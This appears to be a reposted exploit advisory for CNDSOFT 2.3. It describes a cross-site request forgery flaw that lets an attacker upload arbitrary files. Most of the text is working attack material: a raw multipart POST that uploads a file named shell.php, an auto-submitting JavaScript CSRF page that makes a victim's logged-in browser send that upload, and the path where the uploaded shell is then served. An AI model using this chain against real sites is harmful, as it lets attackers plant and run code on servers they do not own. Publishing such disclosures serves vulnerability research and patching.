CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload

2016.10.21
Credit: Besim
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352
CWE-264

*========================================================================================================= # Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php) # Author: Besim # Google Dork: - # Date: 19/10/2016 # Type: webapps # Platform : PHP # Vendor Homepage: - # Software Link: http://www.phpexplorer.com/Goster/1227 # Version: 2.3 *========================================================================================================= Vulnerable URL and Parameter ======================================== Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla Vulnerable Parameter = &mesaj_baslik TECHNICAL DETAILS & POC & POST DATA ======================================== POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://site_name/ofis/index.php?is=kullanici_tanimla aa Content-Type: multipart/form-data; boundary=---------------------------5035863528338 Content-Length: 1037 -----------------------------5035863528338 Content-Disposition: form-data; name="utf8" a -----------------------------5035863528338 Content-Disposition: form-data; name="authenticity_token" CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I= -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_adi" meryem -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_sifresi" meryem -----------------------------5035863528338 Content-Disposition: form-data; name="kullanici_mail_adresi" m@yop.com -----------------------------5035863528338 Content-Disposition: form-data; name="MAX_FILE_SIZE" 30000 -----------------------------5035863528338 Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php" Content-Type: application/octet-stream *<?php phpinfo(); ?>* -----------------------------5035863528338 Content-Disposition: form-data; name="personel_maasi" 5200 -----------------------------5035863528338-- *CSRF PoC - File Upload (Shell.php)* ======================================== <html> <!-- CSRF PoC --> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", " http://site_name/ofis/index.php?is=kullanici_tanimla", true); xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338"); xhr.withCredentials = true; var body = "-----------------------------5035863528338\r\n" + "Content-Disposition: form-data; name=\"utf8\"\r\n" + "\r\n" + "\xe2\x9c\x93\r\n" + "-----------------------------5035863528338\r\n" + "Content-Disposition: form-data; name=\"authenticity_token\"\r\n" + "\r\n" + "CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" + "-----------------------------5035863528338\r\n" + "Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" + "\r\n" + "meryem\r\n" + "-----------------------------5035863528338\r\n" + "Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n" + "\r\n" + "meryem\r\n" + "-----------------------------5035863528338\r\n" + "Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" + "\r\n" + "m@yop.com\r\n" + "-----------------------------5035863528338\r\n" + "Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" + "\r\n" + "30000\r\n" + "-----------------------------5035863528338\r\n" + "Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" + "Content-Type: application/octet-stream\r\n" + "\r\n" + "\x3c?php \r\n" + "\tphpinfo();\r\n" + "\r\n" + " ?\x3e\r\n" + "-----------------------------5035863528338\r\n" + "Content-Disposition: form-data; name=\"personel_maasi\"\r\n" + "\r\n" + "5200\r\n" + "-----------------------------5035863528338--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } submitRequest(); </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html> ======================================== *Access File : *http://www.site_name/path/personel_resimleri/shell.php RISK ======================================== Attacker can arbitrary file upload. -- Besim ALTINOK


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top